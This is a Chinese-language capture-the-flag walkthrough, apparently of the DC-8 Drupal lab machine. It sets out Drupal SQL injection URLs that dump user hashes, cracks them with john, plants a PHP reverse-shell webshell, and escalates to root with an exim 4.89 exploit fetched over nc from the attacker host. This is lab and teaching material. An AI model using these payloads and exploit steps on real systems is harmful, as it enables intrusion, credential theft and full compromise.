首先用 namp 掃描,獲取目標 IP 地址:nmap -sn 192.168.67.0/24
其次再用 nmap 掃描下目標端口:nmap -A -p- 192.168.67.52/24
看來開放了 80 和 22 端口,上去網頁瀏覽下:
點開各個頁面看看,可以發現有些 URL 地址欄會變,在這裏補充個知識 Drupal 的 id 名稱爲 node id 簡稱 nid,這裏因爲顯示 2 3 node 所以想着會不會有 SQL 注入:
嘗試加個單引號,就會產生報錯信息,這在 Sqlilabs 上面訓練的很多了,我們就知道這有注入
http://192.168.67.52/node/?nid=1%27
通過報錯,我們可以看到後臺 SQL 語句爲:
SELECT title FROM node WHERE nid = 1;
下面是手工注入的過程:
http://192.168.67.52/node/?nid=1%27%23
http://192.168.67.52/node/?nid=1 order by 2
–報錯
http://192.168.67.52/node/?nid=-1 union select 1
爆表名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema=database())
爆列名:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')
爆數據:
http://192.168.67.52/node/?nid=-1 union select (select group_concat(name) from users)
http://192.168.67.52/node/?nid=-1 union select (select group_concat(pass) from users)
kali 字典跑一下這兩個用戶:
把密碼存放到 pwd.txt
john pwd.txt
john --show pwd.txt
得到密碼:turtle
http://192.168.67.52/robots.txt 查看一下有什麼頁面,利用剛剛得到的用戶名和密碼登陸:
http://192.168.67.52/user/login/
可以在這個頁面下看到可以上傳 php code,這裏需要在前面隨便加一點東西,否則不會生效:D原因尚不明
保存後,我們提交評論上去,並且 kali 做好偵聽的準備:
webshell可選:/usr/share/webshells/php/php-reverse-shell.php
也可以 weevely 構造:|
提交即可獲取 shell:
ls -l /home
ls -l /home/dc8user
沒有發現
看看有無可疑提權的…
find -perm -4000
看到 exim 沒有,有沒有一種熟悉的感覺?前幾關我們利用過呢~
先查看一下當前 exim 的版本:(man exim 查看文檔)
exim --version
4.89,前面幾關不都是 4.89 嗎?
話不多說,傳 poc:
kali 這邊:
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/k.sh
gedit k.sh
查看下用法
有兩個參數,一個事 -m setuid || 另外一個是 -m netcat,一般第一個的利用都不成功的,直接試 netcat 先
這裏還需要防止格式錯誤:
vim k.sh
set ff=unix
Esc+:+wq
nc -vnlp 6767 < k.sh
/bin/bash這邊:
cd /tmp
nc 192.168.67.221 6767 > k.sh
chmod +x k.sh
bash k.sh -m netcat
一口氣,爽爆了
總結:
1.SQL 注入2.對常見的CMS要深入瞭解3.細心觀察4.linux 提權